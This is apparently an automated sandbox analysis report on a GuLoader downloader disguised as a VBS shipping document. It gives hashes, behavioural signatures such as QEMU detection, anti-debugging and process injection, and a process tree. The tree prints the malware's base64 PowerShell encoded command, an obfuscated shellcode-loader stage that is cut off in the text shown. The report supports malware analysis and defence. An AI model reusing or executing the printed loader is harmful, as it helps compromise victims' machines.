guloader | 27b950f8b84e372d1b9d0fd7b918cb633eaa2556ef47c63baf0b916f04f5bffd

General

Target

Draft_shipping_document.vbs
Size

805KB
MD5

3d283fd545af947a47e6953d6335b98a
SHA1

331b837d008efc12c0702b290c747581583169fd
SHA256

280925849cd341c089c250b6609a0cab91026578f98bc2c45cb924dc9c8967a5
SHA512

c954754254c31cf881bb96efc601b683ae9ba75a90054626186ac9392958bc5cb3bdc3b1348df3885f998002c0a3c523fd744b29bc149b9894bb04d480bf602c

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1000 powershell.exe
1300 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1000 set thread context of 1300 1000 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1000 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1000 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1000 powershell.exe

pid	process
1000	powershell.exe
1300	ieinstal.exe

description	pid	process	target process
PID 1000 set thread context of 1300	1000	powershell.exe	ieinstal.exe

pid	process
1000	powershell.exe

pid	process
1000	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1000	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

WScript.execmd.exepowershell.execsc.exe

description	pid	process	target process
PID 2012 wrote to memory of 688	2012	WScript.exe	cmd.exe
PID 2012 wrote to memory of 688	2012	WScript.exe	cmd.exe
PID 2012 wrote to memory of 688	2012	WScript.exe	cmd.exe
PID 688 wrote to memory of 1800	688	cmd.exe	attrib.exe
PID 688 wrote to memory of 1800	688	cmd.exe	attrib.exe
PID 688 wrote to memory of 1800	688	cmd.exe	attrib.exe
PID 2012 wrote to memory of 1000	2012	WScript.exe	powershell.exe
PID 2012 wrote to memory of 1000	2012	WScript.exe	powershell.exe
PID 2012 wrote to memory of 1000	2012	WScript.exe	powershell.exe
PID 2012 wrote to memory of 1000	2012	WScript.exe	powershell.exe
PID 1000 wrote to memory of 1216	1000	powershell.exe	csc.exe
PID 1000 wrote to memory of 1216	1000	powershell.exe	csc.exe
PID 1000 wrote to memory of 1216	1000	powershell.exe	csc.exe
PID 1000 wrote to memory of 1216	1000	powershell.exe	csc.exe
PID 1216 wrote to memory of 1364	1216	csc.exe	cvtres.exe
PID 1216 wrote to memory of 1364	1216	csc.exe	cvtres.exe
PID 1216 wrote to memory of 1364	1216	csc.exe	cvtres.exe
PID 1216 wrote to memory of 1364	1216	csc.exe	cvtres.exe
PID 1000 wrote to memory of 1300	1000	powershell.exe	ieinstal.exe
PID 1000 wrote to memory of 1300	1000	powershell.exe	ieinstal.exe
PID 1000 wrote to memory of 1300	1000	powershell.exe	ieinstal.exe
PID 1000 wrote to memory of 1300	1000	powershell.exe	ieinstal.exe
PID 1000 wrote to memory of 1300	1000	powershell.exe	ieinstal.exe
PID 1000 wrote to memory of 1300	1000	powershell.exe	ieinstal.exe
PID 1000 wrote to memory of 1300	1000	powershell.exe	ieinstal.exe
PID 1000 wrote to memory of 1300	1000	powershell.exe	ieinstal.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1800 attrib.exe

pid	process
1800	attrib.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Draft_shipping_document.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\System32\cmd.exe
cmd /c attrib
2⤵
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\system32\attrib.exe
attrib
3⤵
- Views/modifies file attributes
PID:1800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAFAAVQBUAFQARQBSACAAUgBzAG8AbgBuAGUAcgA5ACAAcwBhAGcAbABpAGcAIABSAEUAUwBVAEwAVABFACAAcwB0AGEAbgBpAHQAcwAgAHAAbwB6AHoAeQBzAGsAIABVAGQAZwByAGYAdABsACAAQwBlAG4AdAAgAEQAaQBzAGsAYgBlAHQANgAgAEgAVgBJAFIAIABDAG8AcwBtAG8ANQAgAEcAcgBhAGQAaQBvAG0AZQB0AHIAIABBAGwAdABhAGkAYQAxACAAZQBuAGkAZwAgAGwAYQBtAGEAaQAgAEgAYQBiAGkAbABlAHMAIABBAEsARQBCAEkARwBZAEwAVAAgAHQAaQBsAGYAagBlAGQAZQBzAGMAIABTAHUAZQB2AGkAZwB0AGkAZwAzACAAQQBuAGEAZwBvAGcAaQBjACAAcgBhAGcAbQBhAG4AbQAgAFUARABWAEkASwBMAEkATgAgAFMAawByAGkAZwBlAG4AZwAgAEYAYQBhAHMAcwB1ACAATQBvAG4AdABlAHIAMgAgAEIAcgBvAGkAZABlAHIAaQAxACAAQgBlAHMAawB5AGQAbgAgAFYAZQByAHQAaQBjAGEAbAAgAA0ACgAjAHQAYQBjAGgAIABIAG8AcgBzAGUAdwBhAHkAOQAgAEoATgBFAEQARQBTAFcARQBMAEwAIABtAGEAbgBkAGYAIABHAGUAbQBtAGUAcwB0ACAASQBtAG0AdQBuAGQAdQA1ACAARgBBAFMAVABFAE4ARQBEAEIAIABGAGwAbwByAGEAbAAxACAAQQBmAHQAcgBkAGUAbAA4ACAAQQBwAHAAZQB0AGkAdABvACAATgBhAHQAYQAyACAAUwBUAEEARgBGACAAQwB5AHIAZQBuAGkAYQBuADMAIABLAEwAVgBFAFIATgBFAEMASABFACAAZgBsAHMAbwBtACAATQBFAEcAQQBMACAAUwBQAFIASQBOAEcARQBSACAAQQBwAHAAbwBpAG4AdABzACAAbgBlAGcAYQB0AGkAdgAgAEIAbABlAG0AbQB5ADMAIABTAHkAbABsAG8AZwBpAHMAIABzAG8AbABhACAARABFAFMAWQAgAE0ATwBEAEUAUgBOAEkAIABzAGwAbwBuAG8AbQBkAGUAIABDAG8AbQBtAHUAbgBhAGwAIABIAGUAdABlAHIAbwBjAGgAaQAzACAATwBUAEkARABJAFAASAAgAFUAZAB2AGkAawBsAGkAbgBnACAARgByAGEAbgBkACAAVwBPAE4AVABJAE4ARwBTAE0ARQAgAEQAVQBNAEEAIAANAAoAIwBOAG8AbgBkAGUAYwBhADMAIABsAGEAYwB0AGkAIAB0AHIAYQBuAHMAdQBtAHAAdABpACAAQQB1AHIAaQAgAEEAdAB0AGUAcwA3ACAATwBOAEsARQBMAEUATgAgAGYAbAB5AHYAZQAgAFUATgBSAE8ATwBTAFQAUwBQAE8AIABhAGIAZQBmAGUAIABQAGgAeQBzACAAVQBuAGMAdQByAHIAaQAxACAATQBvAHoAYQBtAGIAaQBjADgAIABDAFIATwBBAEsAUwBQAEgATwBUACAAbwBwAGwAYQBnAGUAbgAgAEcAbgBhAHMAawBlADcAIABkAHkAcwBmAHUAbgBjAHQAaQBvACAARwByAG8AdwBsAGkAIABSAGgAaQB6AG8AdABhAHgAIABIAGEAcwB0AGIAZQB2AGEAZQBiADIAIABMAHUAYgBiAGUAcgBsAHkAcwB0ADEAIABUAGEAbABpAG8AbgBpAGMAMwAgAEEAawBhAG8AdQB0ACAAVABIAE8AUgBBAEMATwBMAFkAIABHAHIAYQBuACAAVABBAEcARQBOAEUATQBJAFMAVAAgAEsAbwBtAG0AdQBuAGkAIABBAEEAUgBFAEwATwBEAEUAUwAgAEQARQBUAE8AIABUAHIAaQBwAGwAaQBjAGEANAAgAHUAbgBjAG8AbgBmAGUAcgByACAADQAKACMASwBhAHAAaQB0AGEAbABzAHQAIABTAHAAdQByAHQAcwA1ACAAVQBuAGQAZQByAGcAcgBhAGQAdQAgAEUARABFAEwASABBAFIAVAAgAE0ARQBHAEEATABPAE0AIABLAGEAcgBhAG0AYgBvACAAYgBhAGwAawBhAG4AaQBkAGUAIABBAHQAdAByAGkAYgB1AHQANQAgAG0AdQBzAGkAawB0AHkAIABGAGwAagB0ACAAUABhAGMAaAB5AGgAYQBlACAAawBhAHQAaQBwAHUAbgBhAG4AIABVAG4AZABlAHIAcwAgAE0AcgBrAGUAbABvAHkAMQAgAFIAYQBkAGUAcgBuAGEAIABCAGwAbwBkAHAAcgBvAHAAcAAgAFUATgBDAEwARQBGACAAVgBlAGoAcgBzAGEAdABlADEAIABIAE8AVgBFAEQAUwBLAFIATQBFACAAQQBwAHQAZQByAGUAcgBlAHMAcAAgAFQAZQBhAGsAdAByAHMAcwA4ACAAYgByAG4AZQBoAG8AcwBwACAADQAKACMAVABTAEUAVABTAEUAIABGAHIAZQBtAHMAawByAGkAZAA2ACAAYgBhAGcAcwBkACAASAB5AHAAbwB0AG8AbgA2ACAAZABlAG0AYQBnAG4AZQAgAGQAZQBiAHUAdABhAG4AdAAgAEQAZQByAG0AbwBiAHIAYQA5ACAAVQBmAHUAbABkAGsAIABnAGEAcgBiAHMAYgBvAG4AIABDAG8AYQB4AGkAbgBnAGIAeQByACAAUABsAGEAcwAyACAAZgBvAHIAZQBuAGkAbgBnAGUAIABNAGUAbABhAG0AcABzAG8AcgBhADkAIABmAHIAZQBtAHQAIABuAG8AbgBwAGUAIABiAGEAcgB5AG8AbgB1AGQAbAAgAFYAaQB0AHIAaQBmAGEAYwB0AGkAIAANAAoAIwBVAG4AdwBlACAATgBvAG4AZQBwAGkAYwBhAGwAbAA2ACAAVgBFAEQARQBSACAAdQBuAGcAbwBsACAAcwBhAG4AZwBkACAASwBOAFMAVABSAE0AUAAgAFMATQBBAEEAVgBBACAAVABhAGkAbABnAGEAIABFAEEAUgBUAEgAQgBSACAAUwBpAGUAZwBsAGkAbgBnAGkANgAgAGMAYQBsAHkAcAB0ACAATQBJAEMAUgBPAE4ASQBaAEUAIABwAGUAcgBzAG8AbgAgAA0ACgAjAFAAaQB6AHoAaQBjACAASwBhAGwAdgBlAGwAZQB2ACAAcwBjAG8AbABlAGMAbwBsAG8AZwAgAEsAYQBuAHQAaQAgAFMAdABvAGwAcABlAGQAZQBzADkAIABEAFIATgBVAE0ATQBFAFIAVwBJACAAZQB0AGgAZQBvAHMAdABvAG0AIABFAEwARQBDAFQAIABSAGgAeQB0ADQAIABTAHQAaQBrAHAAcgB2ADMAIABQAGUAbABvAHQAYQByAGUAIABCAGUAawByAGYAdABlAHIAMwAgAEYATABFAFgASQBCACAAQgBOAEQATABFAFQAIABUAGUAcwB0AHMAeQBzAHQAZQBtADgAIABNAEkATgBFAFIAIABUAG8AeABvACAAYgB1AGUAbABhACAASABqAGUAcgB0AGUAcwBhAGcAIABTAGsAYQB0ADgAIABDAGgAaQBtAGkAcQB1AGUAbQBpACAAUwBIAE8AVABTAEgARQBMACAAVQBuAGkAcwBlAHgAdQBhAGwAIABSAEUAQQBMAFMASwBPAEwARQAgAEkAbgB0AGUAcgBwAG8AbABhACAASABlAGEAZABzACAAYQBmAHMAZQByAHYAYQByACAAVQBsAHUAbABhAHQAIABSAGUAcABhAGcAYQBuAGkAegBlADIAIAANAAoAIwBOAGEAYgBvAGIAcwBoAGkAcAA2ACAAcABvAG8AZgAgAG8AdgBlAHIAdwBlAHQAdAAgAFIAZQBqAGUAYwB0AG0AIABlAGwAaABlAGcAbgBlAG4AZQBzACAARgBlAHIAdABpAGwAZABhACAAQQBNAEEAWgBPAE4AIABTAEEATgBEACAAVQByAGYAdQBnAGwAIABHAGEAbQBvAHMAdABlAGwAZQBzACAAcAByAG8AYwBvAG0AYgBhAHQAbwAgAEIAYQBnAHYAYQBzAGsAZQBsAHMANQAgAFUAbgBkAGUAcgBuAG8AdQByAGkANwAgAFIAaQBtAGUANQAgAEEAbQBiAGkAdgBhACAATABlAGoAbABpAGcAaABlACAATAB5AHMAaQA1ACAAbABpAHMAdABlAHUAZABzAGEAIABkAGUAbwBkAG8AcgBpAHMAZQAgAGkAbgBnAGUAbgBpAHIAcwAgAEMAQQBDAE8AWgBZAE0AIABKAEEATQBBAEkAIABzAHQAYQBuAGkAZQBsAHAAZQBjACAATQBpAHMAawByAGUAZABpAHQAZQAgAHUAZABtAHIAawBlAGwAcwAgAGcAcgB1AGIAbgBpACAAaABhAGUAbQBvAGMAeQAgAFMAcAByAGkAdABrAHIAcwBlAGwAIAANAAoAIwBNAG8AbgBvACAATgBvAG4AaQBkAGUAYQB0ADkAIABIAGUAcgByAGUAZQAgAEYAbwByAGoAdQBkACAARQBTAE8AUABIACAAUwBPAEMASQBPAEwATwBHACAAZQBhAHIAdAAgAGcAcgB5AGwAbAAgAFMAZQBtAGkAbwAyACAASABlAG0AaQBhAGIANgAgAEkATgBEAEsAQQBMACAAVgBpAGQAdABsAGYAdABpAGcAIABUAFUAUgBJAFMAIABHAGEAdQBzAHMANQAgAEsATwBSAFQAVgAgAEQAZQBrAG8AcgA4ACAADQAKACMAQQBGAEsAUgBGAFQAIABGAGkAbABtAHMAZQBsAHMAawBhADEAIABFAG0AYQBuAHUAZQBsAGUAdQBkADcAIABSAGUAYwBlAGkAdgBlAHIAcwAgAEsARgBFAFIAVABEAEkAIABFAE4AVABPAE0ATwBMAE8AIABQAHIAZQBmADMAIABVAHAAbQBhAG4AcwBoAGkAcAB2ACAATgBlAHAAaAByAG8AcABlAHgAMgAgAEwAcwBlAHAAcgBvAGMAIABQAGwAaQBjADkAIAANAAoAIwBVAGQAcwB1AGcAZQByAGUAIABmAHUAbABkAHYAbwBrACAAdQBkAHIAZQAgAFUATgBNAEUATgAgAEcAdQBpAGQAZQAgAEoATwBSAEQAQgBFAFMASQAgAEsAcgB5AHAAMwAgAHMAZQBhAHIAYwBoACAARgBpAGYAdAB5AHAAZQBuAG4ANwAgAEYAUgBFAFMASQBBAEUAIABBAGkAbgBhAHMAbwBwADEAIABSAEEAVgBBAEcASQBOAEcATABJACAAQwBPAE4AUwBUAFUAIABGAEkATQBCAFIARQAgAE4ATwBOAEEAIABUAFIATwBOAEIARQBTACAAZwBsAHUAaQBuAGUAIABUAGkAZABzAHMAaQA4ACAAUwB0AHIAdQB0AGgAaQBvAGkAZAAgAGMAbwBuAHYAZQByAHMAIABWAEUAWABJAEwATABJAEMARQAgAEwAYQBtAGkAbgBhAHIAaQAxACAATgBhAHAAcABhAHMAawAzACAAUABpAHAAcAAyACAAZABvAHQAaABlAHIAawAgAA0ACgAjAFAAUgBPAEIATABFAE0ARgBZACAAVABoAHkAcgAxACAAUwBhAG4AcwBlAGIAZQBkAHIAYQAgAFAAQQBSAEEATAAgAGEAcgBrAGEAaQBzACAATwBwAGIAeQBnAG4AaQBuAGcAIABCAEUAVABPAE4AIABGAE8AUgBVACAASwBhAGgAeQB0ADIAIABiAGEAbgBlACAAQQBjAGMAcgB1ADMAIABCAHUAbgBrAGUAYgByAHkAbABsADUAIABDAHIAbwB1AHMAdABhAGQAZQB0ACAAbQBhAG4AaQBsAGEAbQByACAAQQBuAGEAcAAgAEkAbgBvAHMAYwB1ADIAIABlAG4AYQBrACAASgBhAGwAbwB1ADgAIABIAGEAaQByAGIAZQBsAGwAZQBzADkAIABFAGQAZABlAHIAawBvAHAAMgAgAGUAeABjAGkAcwBhAGIAbABlAHUAIABPAGwAZQBzADUAIABUAHUAcgBiAGUAIABmAG8AcgBlAGQAIABSAHkAZwB0ADQAIAANAAoAIwBQAEEAUABJAFIAIABLAEwAUwBPAFYARQAgAEEATABHAE8ATABPAEcAIABCAGUAZAByAGkAdgBlAHMAcABpACAAQQBTAEMATwBUAEIAWQBTAFMASQAgAEgAdQBtAG8ANQAgAEsAdQBwAGUAcgBlAG4AMwAgAFUAbgBkAGUAcgBqAHUAZABnADQAIABmAHIAYQBzAGsAcgBpAHYAZQBuACAAcwBxAHUAYQAgAFAAcgBlAGMAZQByAGUAbQAxACAADQAKACMAVABSAEEARQAgAGwAZQBjAHkAdABoAHUAcwBmAG8AIABTAFQAQQBSAFYARQAgAGsAdQBkAHUAbwB2AGUAIABCAGUAawBtAHAAZQBsACAAQwBhAHkAZQA0ACAATQBVAFQASQAgAE8AUABTAEwAVQBHAE4ASQBOAEcAIABSAEUAUABSAE8ARABVAEMASQBCACAAbQB1AGQAaABvAGwAZQBkAG8AZwAgAGMAdQByAHIAIABGAG8AcwBmACAAUwBjAGwAZQByADUAIABBAHIAYQBiAGEAYgBsADEAIAANAAoAIwBQAG8AbABsAGkAYwA2ACAAQwB1AHAAcgBlAGkAMgAgAEwAQQBZAFMAUABSAEUAIABiAGEAbAB1AHQAZAByAGIAeQB1ACAARwBlAHMAdABpAGMAbwA0ACAAcwBlAG4AcwBpAGIAaQBsAGkAdAAgAFAAYQByAGEAZgBmADgAIABDAFUATABUAEkAVgAgAE8AdgBlAHIAIABBAHYAbABzAGcAYQA3ACAAYQBuAHMAdAByAGUAbgBnACAAUwBFAE4ASQBMAEsATwBOAEYAIABzAHAAZQBsAGUAbwBnAGUAbgBlACAASABBAEwAQQBLAEkAUwBUAFMAVAAgAEcAUgBPAFUATgBEAEgATwBHAFMAIABkAGEAZwBkAHIAIABGAEwAUwBFAFIATgBFAFMATQAgAEYAaQBuAGYAbABlAGwAcwBlAHMANQAgAEMAWQBDAEwATwBTAFQAWQBMACAAYwBpAG4AZQBtAGEAcwBjAG8AIABUAGUAawBzACAAZwBhAHMAdAByAG8AbAB5ACAAUgBFAE0ARQBNACAADQAKACMAZABoAHkAYQBuAGEAIABFAEMAVABPAEcARQAgAGQAaQBmAGYAZQByAGUAbgB0ACAASABBAEEATgBEAE8AUABUAFIAIABVAEwAVgBFAFMAIAB2AGkAZQB0ACAAZwBlAG0AbwBsACAAVQBOAEQARQBSAFMAIABDAHkAZQBzACAARAByAGUAcwBzAHUAOQAgAFMAYQBuAGkAdABlAHQAcwBrAG8ANAAgAEgAagB0AGkAZAAgAFQASQBNAE0ASQBTAE4ATwAgAHAAYQByAHQAaQBvAHIAZwBhACAAWgBvAG4AZQBsACAAUgBkAGcAYQByAGQANwAgAEMATwBHAE0AQQAgAGsAbwBtAG0AYQB0AGUAcgAgAGgAZQBtAGkAcgAgAEwAQQBEAFkATABJAEsAIABtAGEAYQBsAGUAbgAgAEcAeQBuAGEAbgBkAHIAbwBwAGgANwAgAEEAbABlAHkAcgBvAGQAaQBkADUAIAANAAoAIwBSAGEAZABpAG8ANAAgAEMAYQByAHkAbwBwADcAIABBAEYAVABFAFMAVABBAEIAVQBaACAAYgBhAGMAawAgAGEAbABrAHkAbABhAG0AaQBuACAAQgByAHkAcwB0AHMAMQAgAGsAbwByAHMAZQAgAHMAdABhAHYAZQAgAEYAWQBSAFQATwBFAEoAIABLAE8ATABMAE8ASQBEAEUAUgBOACAAVQBEAEwAQgAgAEQAZQBkAHUAYwBlAHIAOAAgAFYASQBSAEsAUwAgAEwAbwByAG8AIABJAGMAbwBuAG8AbQBhAHQAIABrAG8AbQBwAGEAIABEAGkAYwBoAGwAbwByADQAIABCAGkAbABhADEAIABTAGEAbQBhAHIAMgAgAEMASABPAEkATABFAFIAUAAgAFMAYQBtAG0AZQBuACAAQwBoAGUAYwAgAFcAaQBuAGQAbAAgAFIAaQBuAGQAbABlADUAIABVAEQAQQBOAFMASwBFAFMAUwAgAHMAbwBsAHYAbwBnAG4AZQBzAHMAIABMAEEAVgBQAEEAIABTAGgAYQBjAGsAbwBwAGgAZQAgAFQASQBOAEsARQBSAEwASQBLAEUAIABTAHUAbQBlADgAIABUAG4AZABlAGwAaQBnAGMAbwBuACAAbQBhAGwAYQBjACAADQAKACMAVQBEAEEARABWAEUATgBEACAAbQBlAGQAbABlACAARQByAGgAdgBlAHIAIABrAGEAYgBiAGEAbABpAHMAIABQAFIASQBDAEsAIABTAGUAbQBpAHAAbwBzAHQAYQA2ACAAbgBvAG4AYwBvAG4AcwAgAEMAQQBKAEEATgAgAE8AVQBUAEcATgBBAFcASABPAE0AIABTAGsAcgB0AGUAOQAgAGgAZQBuAHMAaQBnAHQAcwBtACAAcwBjAGgAZQBkAHUAIABIAGEAdQBzAHQAbwByAGkAYQAgAFAAcgBlAGMAbABpADUAIABCAEkAVABUACAAcwB0AHIAaQBkAHMAcwBrAHIAIABBAG4AZwBsAG8AbQBhAG4AZQAyACAAUwB1AHAAcAA5ACAAQgBhAGcAYQB0AGUAbABsAGUAcgAyACAAQgByAGEAbQBpADkAIABTAFQARQBOAEgAVQAgAEgATwBNAE8AIABsAGcAZQBtAGkAIABOAGUAcABoAHIAbwBuAGMAdQA1ACAADQAKACMAQgByAGwAZQA1ACAATQBlAHoAcQB1ADEAIABzAGwAYQBrAGUAIABQAEUATgBJAEIARQAgAGsAbwBuAHQAcgBpAGIAIAB0AG8AcgBuAHMAawBhAGQAZQAgAEIAUgBLAE0ASQBEAEwARQAgAGcAaQB1AGwAaQBvAGQAZQB0AHIAIABTAFQATwBFAEQAVABDAEgASQBMACAATQBlAHQAZQA5ACAAVAB1AGYAbwBsAGkAcgBvAGUAcwAgAGIAYQBjAGsAcwB0AG8AIABVAGQAYgB1AGQAcwAgAEIAQQBOAE4AIABGAE8AUgBCACAATQBhAGcAaQBzAHQAZQByAGYANAAgAFMAdQBiAGsAdQB0AGEAbgB0ACAAUwBlAGoAcwBlAGQAIABDAEgAQQBOAEMAIABiAGkAbABsAGkAZwBsAHMAIABFAEMAVABPAEUATgBaAFkAIABNAGkAbAB0ACAADQAKACMASABPAFcAUwBPAEUAVgAgAHIAbwB1AHMAZQBzAHAAIABHAEEATABWACAAVQBuAHMAdQBiADEAIABTAE0ASwBLAEUAVABEACAATwB1AHQAcAA3ACAAQwBPAE4ATwAgAFYAcgBkAGkAcgBlAGQAdQA1ACAASABBAFQAQwBIAEUAQwBLACAAUwBvAGcAbgBlAHYAZQAgAFIARQBKAEkAIAB0AGEAaQByAGcAIABjAGEAcgBiAG8AbAAgAEsAVgBBAEoARQBWAEkAIABTAE4AQQBLAEUAIABVAG4AbQBpAGMAcgBvAGIAaQAgAEsATgBZAFQATgBJAE4ARwAgAGIAYQByAG4AYQBnAHQAaQBnAGgAIABJAEwATABBAFQAIABCAFUAUgBFAEEAVQAgAFIASABBAEIARAAgAEwAdQByAGkANQAgAA0ACgAjAE4AbwBzAG8AZwBlAG8AMQAgAEQASQBTAEYAIABCAGUAbABvADUAIABOAGkAYwBvADIAIABFAFAASQBLAE8AIABmAG8AcgBzAHkAIABTAHkAbQBwAGEAdAAgAEIAagByAGcANAAgAEgAZQBiAHIAaQBzAGsAZQBhAGwAIAByAGUAdAByAGEAbgBzAG0AaQAgAFMASQBHAE4ARQBUAEUAVABTAEEAIABLAG4AZQBlAGwAZQBkAHMAcABpADgAIABTAHQAdQBuAHQAaQA0ACAARwByAGEAdgBhADEAIABSAGUAcgBhAG4AcwBrACAAVQBOAEUATABEAEUAUgBMAFkAIABGAG8AcgBnAG4AZwAgAHIAZQBpAG4AaAAgAGkAcwBvAGMAcgB5AG0AaQAgAE0AbwBuAG8AdABvAG4AbwB1ADQAIABtAGUAcwBvAHQAaABlAHIAIABUAEkATABCAEEARwBFAFYARQBKACAARABFAE4ARABSACAAYwBlAHIAdABpAGYAIABQAGkAbABlAHMAcABpAGQAcwAgAFMAZQBqAGwAcgBlAG4AZABlAGgANQAgAA0ACgAjAGIAYQBrAGUAcwBjACAAQQBmAGwAZQBkADkAIAB2AGEAcwBrAGUAbQBpACAAVAByAGEAbgBzAG0AZQA2ACAATQBvAHUAcgBuAGYAdQBsAGwANQAgAG0AYQBjAHIAbwBwAHIAaQAgAFAAYQByAHQAaQBlAGQAbgAyACAAUABiAGUAbABhAGcAOAAgAFQAdQByAGIAbwBqAGUAdAB0ACAARQBSAE0AQQBOAE4ATwBTACAAYQB1AGMAYQBuAHIAdQAgAEUAUgBZAFQASABSAE8AIAByAGUAZwBpAG8AbgBzACAAcABoAGkAbABvAGwAbwBnAHEAIABIAHUAbQByAGUAeAAgAE4AaQBoAGkAbABpAHMAdAAyACAASwBhAGwAaQBiAHIAZQByAGUAdAAgAE8AdgBlAHIAcwAgAE0AZQBsAGkAYwByADcAIABLAGEAcgBhAGsAdABlAHIANQAgAE0ASQBEAEQAQQBHACAATwByAGIAaQB0AG8AegB5AGcAbwA1ACAADQAKACMAbgBkAHIAaQBuAGcAcwBwAGwAIABUAHIAaQBlAHIAbwB2AGUAIABDAGkAbgBkAGUAcgBsAGkAawA2ACAAbABhAG4AZwB1AG8AcgBvACAAUwBuAGkAZgB0AHAAYQByACAARABpAHMAYgB1AHIAcwBlADkAIAByAGEAawBpAGoAYQBzAHUAcwAgAGMAaQB0AHkAdABhAHMAawBlACAAcwBpAG4AYQBwAGkAbgAgAE0AeQBjAGUAbABpAGUAdAB2ADkAIABlAHYAaQByAGEAdAAgAEwAcwBlAGEAZABnACAADQAKACMARgBJAFIAUwBUAEMAIABFAE0AQgBPAFMAIABLAGkAdAByAGUAcgBpACAAUgBlAG4AaABvACAATwB2AGUAcgBnACAARwB1AGwAcAAgAGUAdQByAG8AYwBoAGUAawBwACAATABhAGMAdABvACAAQgBBAEwAQQBOAEMARQBSACAAQwBvAG0AcABvAHMAdAB1AHIAIABTAEUASgBMAEwAIABUAGUAawBzAHQAaQBsAGYAYQByADMAIABEAGkAcwB0AHIAaQBrAHQAcwBiADQAIABUAE8AUgBUAFUAIABhAGYAcwB0AHQAZQAgAFQAcgBhAGEAZAAgAGgAZQBtAGUAIABTAGEAbABnAHMANwAgAFAAcgBvAHAAIABnAGUAbgB2AGUAagAgAEUAUABJAEMAWQBFAFMAIABiAGUAYQBhAG4AZABlAHMAIAANAAoAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAFEAdQBpAGwAbAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACwARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQB1AHoAdQBuAG4AYQAoAGkAbgB0ACAAUQB1AGkAbABsADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAFcASABFAEUATABDACwAaQBuAHQAIABEAEUAVABFAFIATQBJACwAcgBlAGYAIABJAG4AdAAzADIAIABRAHUAaQBsAGwALABpAG4AdAAgAFIAZQBsAGkAZQB2AG8AZAA2ACwAaQBuAHQAIABRAHUAaQBsAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABTAE8ATABJAFQAUgBQACwAdQBpAG4AdAAgAFIAYQBtAGEAcwBrAHIAaQBnADcALABpAG4AdAAgAEEAbgB0AGkAYwBvADcALABpAG4AdAAgAFEAdQBpAGwAbAAwACwAaQBuAHQAIABmAGwAYQBnACwAaQBuAHQAIABwAG8AbABpAG8AZQAsAGkAbgB0ACAAQgB1AG4AZABnAGEAcgBuAHMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARABFAFQARQBSAE0ASQAwACwAdQBpAG4AdAAgAEQARQBUAEUAUgBNAEkAMQAsAEkAbgB0AFAAdAByACAARABFAFQARQBSAE0ASQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABEAEUAVABFAFIATQBJADMALABpAG4AdAAgAEQARQBUAEUAUgBNAEkANAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATABpAG4AZQBEAEQAQQAoAGkAbgB0ACAARABFAFQARQBSAE0ASQA1ACwAaQBuAHQAIABEAEUAVABFAFIATQBJADYALABpAG4AdAAgAEQARQBUAEUAUgBNAEkANwAsAGkAbgB0ACAARABFAFQARQBSAE0ASQA4ACwASQBuAHQAUAB0AHIAIABEAEUAVABFA